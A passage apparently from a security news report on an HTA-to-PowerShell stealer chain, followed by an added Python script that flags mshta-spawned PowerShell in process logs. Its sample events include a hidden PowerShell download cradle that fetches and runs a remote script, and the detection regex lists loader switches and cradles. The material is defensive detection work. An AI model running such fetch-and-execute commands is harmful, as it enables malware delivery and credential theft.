Once executed, the HTA script (an HTML Application, which runs as a standalone Windows program written in HTML) launches PowerShell code that ultimately establishes command and control (C2) and downloads both decoy PDF files, used for evasion, and a malicious shell injector.
“These files aim to inject the final stealer into legitimate processes, initiating malicious actions and sending the stolen data back to a C2 server,” Fortinet added.
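The chain described above has a telemetry footprint that defenders can key on: an HTA is run by mshta.exe, so the PowerShell stage appears as powershell.exe with mshta.exe as its parent, usually with hidden-window, policy-bypass, encoded-command or download-cradle arguments. The script below is an added example (not Fortinet's code or anything from the report) that scores process-creation events on exactly those traits. The event records, host paths and the 10.0.0.5 URL are constructed sample data, and the field names only loosely mirror Sysmon Event ID 1.

```python
"""Flag process-creation events consistent with an HTA-launched PowerShell
stage: powershell.exe spawned by mshta.exe, and/or typical loader arguments.
Added detection example; the events below are constructed, not real telemetry."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (names loosely follow Sysmon Event ID 1)."""
    utc_time: str
    parent_image: str
    image: str
    command_line: str


# Constructed sample events (hypothetical hosts, paths and URL), not from the report.
SAMPLE_EVENTS = [
    ProcEvent("2024-01-01 10:00:00", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Users\u\Downloads\Invoice.hta"'),
    ProcEvent("2024-01-01 10:00:01", r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgAIAAo..."),
    ProcEvent("2024-01-01 10:05:00", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-ChildItem C:\\Temp"),
    ProcEvent("2024-01-01 10:06:00", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://10.0.0.5/a.ps1')\""),
]

# Arguments commonly seen in PowerShell loader stages: hidden window, execution
# policy bypass, encoded command, and download cradles.
SUSPICIOUS_ARGS = re.compile(
    r"(?i)(?:-enc(?:odedcommand)?\b|-w(?:indowstyle)?\s+hidden|"
    r"-e(?:xecutionpolicy|p)\s+bypass|"
    r"\b(?:iex|iwr|invoke-expression|invoke-webrequest|downloadstring|"
    r"downloadfile|start-bitstransfer)\b)")


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons) for one event. Only PowerShell children are scored:
    +2 when the parent is mshta.exe, +1 per distinct suspicious argument."""
    reasons = []
    if basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return 0, reasons
    from_hta = basename(ev.parent_image) == "mshta.exe"
    if from_hta:
        reasons.append("powershell.exe spawned by mshta.exe (HTA stage)")
    tokens = sorted({m.group(0).lower()
                     for m in SUSPICIOUS_ARGS.finditer(ev.command_line)})
    reasons.extend(f"suspicious argument: {t}" for t in tokens)
    return 2 * from_hta + len(tokens), reasons


def detect(events, threshold=2):
    """Return [(index, score, reasons)] for events scoring at or above threshold."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits


if __name__ == "__main__":
    for i, score, reasons in detect(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[i]
        print(f"[{ev.utc_time}] score={score} {ev.command_line}")
        for r in reasons:
            print("   -", r)
```

The mshta.exe parent alone clears the threshold, so an HTA stage is caught even if the attacker drops the telltale switches; the argument scoring additionally catches the plain download cradle launched from cmd.exe in the fourth sample, while the interactive Get-ChildItem call scores zero. Tune the threshold and the argument list to your environment before deploying anything like this.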
The target applications of the observed stealer included web browsers, crypto wallets, messengers, email clients, VPN services, password managers, AnyDesk, and MySQL Workbench, among many others.